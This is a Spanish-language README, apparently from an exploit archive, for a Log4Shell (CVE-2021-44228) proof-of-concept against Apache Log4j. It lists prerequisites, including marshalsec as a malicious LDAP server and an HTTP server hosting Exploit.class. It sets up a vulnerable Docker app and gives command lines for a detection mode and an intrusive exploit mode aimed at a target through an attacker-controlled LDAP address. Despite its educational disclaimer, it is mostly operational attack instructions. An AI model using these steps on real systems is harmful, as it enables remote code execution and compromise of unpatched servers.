## https://sploitus.com/exploit?id=3CAFA0CD-5848-5050-B308-F870F484DBE4
# Log4Shell
(CVE-2021-44228)
# ☠️ Log4Shell PoC (CVE-2021-44228)
Exploit de prueba para la vulnerabilidad crítica **Log4Shell** en Apache Log4j ≤ 2.14.1, que permite ejecución remota de código mediante inyecciones JNDI.
> ⚠️ **Este PoC es solo para fines educativos y pruebas controladas en entornos autorizados.** No lo utilices contra sistemas sin permiso expreso.
---
## Requisitos
- Python 3.x
- Java 8 o superior
- [`marshalsec`](https://github.com/mbechler/marshalsec) (para el servidor LDAP malicioso)
- Servidor HTTP (por ejemplo, `python3 -m http.server`)
- Docker (opcional para entorno vulnerable)
---
## Entorno de prueba local (opcional con Docker)
1. Ejecuta la app vulnerable:
```bash
docker run -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app
```
2. Accede a: http://localhost:8080
```bash
git clone https://github.com/mbechler/marshalsec.git
cd marshalsec
mvn clean package -DskipTests
```
---
## Uso
### Modo detección pasiva:
```bash
python3 main.py -u http://target.com -i burp.collab.net -m detect
```
### Modo intrusivo (requiere Exploit.class en tu HTTP):
```bash
python3 main.py -u http://target.com -i 192.168.0.100:1389 -m exploit
```
---